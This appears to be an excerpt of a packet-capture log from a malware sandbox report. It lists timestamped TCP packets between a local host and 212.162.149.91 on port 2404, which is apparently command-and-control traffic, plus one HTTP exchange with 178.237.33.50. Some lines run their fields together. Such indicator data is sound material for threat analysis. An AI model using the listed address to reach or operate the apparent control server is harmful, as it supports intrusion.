                                                                          Dec 10, 2024 13:53:02.193830967 CET499332404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.200364113 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.200432062 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.313328981 CET240449933212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.319662094 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.562663078 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.564678907 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.564691067 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.564702988 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.564742088 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.564908981 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.681986094 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.682003975 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.682015896 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.682028055 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.682039976 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.682075024 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.682085991 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.682097912 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.682204962 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.744784117 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.744824886 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.744996071 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.749021053 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.749124050 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.749331951 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.757767916 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.757848024 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.757914066 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.766302109 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.766485929 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.766545057 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.801556110 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.801668882 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.801853895 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.805923939 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.806057930 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.806174040 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.814626932 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.814734936 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.814790010 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.823272943 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.823359966 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.823414087 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.831840038 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.831938028 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.835171938 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.840539932 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.840682030 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.840732098 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.849108934 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.849225044 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.849294901 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.859683990 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.859836102 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.860219002 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.937267065 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.937442064 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.937505960 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.941554070 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.941735983 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.941786051 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.950057030 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.950158119 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.950227022 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.958652973 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.958832026 CET240449939212.162.149.91192.168.2.5
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Dec 10, 2024 13:53:02.958970070 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:02.967271090 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:02.967408895 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:02.967456102 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:02.975938082 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:02.976069927 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:02.976120949 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:02.984561920 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:02.984618902 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:02.984668016 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:02.992980003 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:02.993078947 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:02.993119001 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.000854969 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.000971079 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.001015902 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.008397102 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.008510113 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.010541916 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.015923023 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.015978098 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.016024113 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.023484945 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.023642063 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.023690939 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.030925035 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.031060934 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.031100035 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.038455009 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.038577080 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.038883924 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.045958042 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.046099901 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.046148062 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.053539991 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.053760052 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.053816080 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.060964108 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.061095953 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.061156034 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.068593979 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.068721056 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.068764925 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.076042891 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.076230049 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.076277971 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.083245039 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.083458900 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.083863974 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.089730024 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.089855909 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.089921951 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.095463037 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.095535040 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.095596075 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.129038095 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.129133940 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.131279945 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.131762028 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.132776976 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.132823944 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.132862091 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.138374090 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.138421059 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.138488054 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.143939972 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.143975019 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.143990993 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.149545908 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.149590015 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.149653912 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.154376030 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.154422045 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.154620886 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.159090996 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.159136057 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.159212112 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.163902998 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.163952112 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.164016008 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.168565989 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.168579102 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.168621063 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.173110962 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.173156977 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.173186064 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.175714970 CET  80           49940      178.237.33.50   192.168.2.5
Dec 10, 2024 13:53:03.175765991 CET  49940        80         192.168.2.5     178.237.33.50
Dec 10, 2024 13:53:03.177714109 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.177757978 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.177793980 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.182038069 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.182080984 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.182158947 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.186377048 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.186422110 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.186481953 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.190643072 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.190691948 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.190763950 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.194900990 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.194952011 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.195009947 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.199170113 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.199214935 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.199275017 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.203140020 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.203190088 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.203282118 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.207230091 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.207273960 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.207340956 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.209934950 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.209981918 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.210068941 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.212635994 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.212682009 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.212738037 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.215301037 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.215347052 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.215396881 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.218029022 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.218075037 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.218187094 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.220752954 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.220798969 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.220886946 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.223387957 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.223437071 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.223598957 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.226068974 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.226212978 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.226238012 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.228704929 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.228974104 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.229027033 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.231385946 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.231475115 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.231528044 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.234005928 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.234117031 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.234154940 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.236669064 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.236799955 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.236845016 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.239345074 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.239386082 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.239428043 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.242111921 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.242371082 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.242432117 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.244683027 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.244781971 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.244839907 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.247325897 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.247373104 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.247452974 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.249995947 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.250037909 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.250092983 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.252701044 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.252830029 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.252882004 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.255295992 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.255342007 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.255378008 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.257992983 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.258063078 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.258100986 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.260673046 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.260740042 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.260787964 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.321082115 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.321152925 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.321208000 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.322211027 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.322320938 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.322365046 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.324408054 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.325212955 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.325259924 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.325318098 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.327539921 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.327625036 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.327666998 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.329824924 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.329880953 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.329968929 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.332405090 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.332493067 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.332535982 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.334358931 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.334456921 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.334523916 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.336530924 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.336584091 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.336617947 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.338673115 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.338769913 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.338816881 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.340755939 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.340818882 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.340862036 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.342725992 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.342766047 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.342827082 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.344722033 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.344826937 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.344868898 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.346592903 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.346719980 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.346757889 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.348453045 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.348567963 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.348604918 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.350332975 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.350374937 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.350430965 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.352175951 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.352236986 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.352282047 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.353193998 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.353266001 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.353307009 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.355021954 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.355220079 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.355264902 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.356652021 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.356759071 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.356801987 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.358380079 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.358417988 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.358500004 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.360105038 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.360208988 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.360245943 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.361758947 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.361850023 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.361892939 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.363450050 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.363490105 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.363548994 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.365247011 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.365329981 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.365370989 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.366708994 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.366827011 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.366880894 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.368396044 CET  2404         49939      212.162.149.91  192.168.2.5
Dec 10, 2024 13:53:03.368448973 CET  49939        2404       192.168.2.5     212.162.149.91
Dec 10, 2024 13:53:03.368465900 CET  2404         49939      212.162.149.91  192.168.2.5
                                                                          Dec 10, 2024 13:53:03.370011091 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.370059967 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.370145082 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.371579885 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.371628046 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.371673107 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.373219967 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.373291969 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.373339891 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.374758959 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.374803066 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.374844074 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.376322985 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.376364946 CET240449939212.162.149.91192.168.2.5
